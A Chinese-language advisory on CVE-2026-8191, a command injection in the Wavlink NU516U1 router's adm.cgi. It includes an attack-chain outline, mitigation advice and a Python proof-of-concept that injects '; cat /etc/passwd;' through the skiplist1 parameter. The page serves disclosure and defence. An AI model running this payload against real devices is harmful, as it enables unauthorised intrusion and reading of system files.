CVE-2026-8191 Wavlink路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-8191

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wavlink NU516U1

漏洞概述

Wavlink NU516U1路由器M16U1_V240425版本存在操作系统命令注入漏洞。攻击者可利用/cgi-bin/adm.cgi文件中wifi_region函数的skiplist1/skiplist2参数，在无需用户交互的情况下远程注入恶意命令。此漏洞直接影响设备的机密性、完整性和可用性，风险较高。

技术细节

该漏洞源于Wavlink NU516U1设备固件中的/cgi-bin/adm.cgi脚本对用户输入缺乏严格的过滤机制。当攻击者向服务器发送请求时，程序在处理wifi_region功能时，直接将skiplist1和skiplist2参数的值传递给系统底层命令执行函数。由于未对特殊字符（如分号、管道符）进行转义，攻击者可以构造特定的HTTP POST请求，在参数中拼接任意Shell命令。考虑到CVSS 3.1评分为6.3，攻击复杂度低且无需用户交互，攻击者能够以设备权限远程执行恶意指令，如反弹Shell或修改系统配置，从而完全控制目标IoT设备。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出运行Wavlink NU516U1固件且暴露了Web管理接口的目标设备。

STEP 2

构造攻击载荷

攻击者构造恶意的HTTP POST请求，针对/cgi-bin/adm.cgi接口，在skiplist1或skiplist2参数中注入Shell元字符（如; | &）及后续的恶意命令。

STEP 3

发送请求

攻击者将构造好的恶意数据包发送给目标设备的Web服务器。

STEP 4

命令执行

由于后端CGI脚本未过滤输入，直接将参数传递给系统调用，导致注入的恶意OS命令在设备后台以Root权限执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Target endpoint
    url = f"http://{target_ip}/cgi-bin/adm.cgi"
    
    # Malicious payload to inject OS command
    # Using semicolon to separate commands
    payload = {
        "wifi_region": "US",
        "skiplist1": "; cat /etc/passwd;", 
        "skiplist2": "test"
    }
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-8191-Scanner/1.0)"
    }
    
    try:
        print(f"[*] Sending exploit payload to {target_ip}...")
        response = requests.post(url, data=payload, headers=headers, timeout=5)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response body:")
            print(response.text[:500]) # Print first 500 chars
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print("Usage: python cve_exploit.py <target_ip>")
    else:
        exploit(sys.argv[1])

影响范围

Wavlink NU516U1 M16U1_V240425

防御指南

临时缓解措施

建议立即检查设备固件版本，如受影响请断开设备外网连接并升级固件。若无法立即升级，应通过防火墙规则封禁外部对设备80/443端口的访问，仅允许本地管理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8191
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8191
3 Details https://www.cvedetails.com/cve/CVE-2026-8191/
4 VulDB https://vuldb.com/cve/CVE-2026-8191
5 Link https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_4/4.md
6 Link https://vuldb.com/submit/800730
7 Link https://vuldb.com/vuln/362343
8 Link https://vuldb.com/vuln/362343/cti